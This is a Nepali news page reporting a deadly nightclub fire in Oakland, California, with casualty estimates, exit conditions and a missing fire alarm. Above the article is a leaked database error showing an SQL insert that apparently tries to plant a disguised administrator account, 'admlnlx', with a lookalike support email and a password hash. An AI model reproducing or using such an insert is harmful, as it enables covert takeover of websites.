WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOtZrH29hPd3AfN1nig86VGudn6nsj.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:17:50', '', 'admlnlx', 'admlnlx')
क्यालिफोर्निया,मंसिर १९–
क्यालिफोर्नियाको एक नाइट क्लबमा आगलागी हुँदा कम्तीमा ९ जनाको मृत्यु भएको छ भने मृत्यु हुनेको संख्या बढ्न सक्ने समाचारमा उल्लेख गरिएको छ। अधिकारीहरूलाई उदृत गर्दै बीबीसीले आगलागीमा परी मृत्यु हुनेको संख्या ४० पुग्न सक्ने जनाएको छ। अकल्यान्डका आगलागी नियन्त्रण प्रमुख टेरेसा डेलोचे रेडले क्लबमा ५० देखि १ सय जनासम्म रहेको हुन सक्ने अनुमान गरेका छन्। आगलागी स्थानीय समानुसार शुक्रबार राति साढे ११ बजे लागेको थियो।
क्लबले एक कन्सर्टको आयोजना गरिरहेको थियो। उक्त कन्सर्टमा इलेक्ट्रोनिक ग्रुप गोल्डेन डोन्नाले प्रस्तुति गरिरहेको र थप ६ वटा प्रस्तुती पनि रहेको बीबीसीले जनाएको छ। समाचारमा उल्लेख गरिए अनुसार नाइट क्लबको दोस्रो तत्लामा धेरै मानिस जम्मा भएको र त्यहाँ धेरै मानिसको मृत्यु भएको हुन सक्ने उल्लेख छ। वेयरहाउसमा बनेको नाइट क्लबमा आगलागी भएपछि छत खसेको समाचारमा जनाइएको छ। दोस्रो तल्लामा मात्र दुई वटा ढोका थिए। तर, भागदौड र आगोका कारण मानिसहरू बाहिर निस्किन सकेका थिएनन। क्लबमा फायर अलर्ट सिस्टम लगाइएको थिएन।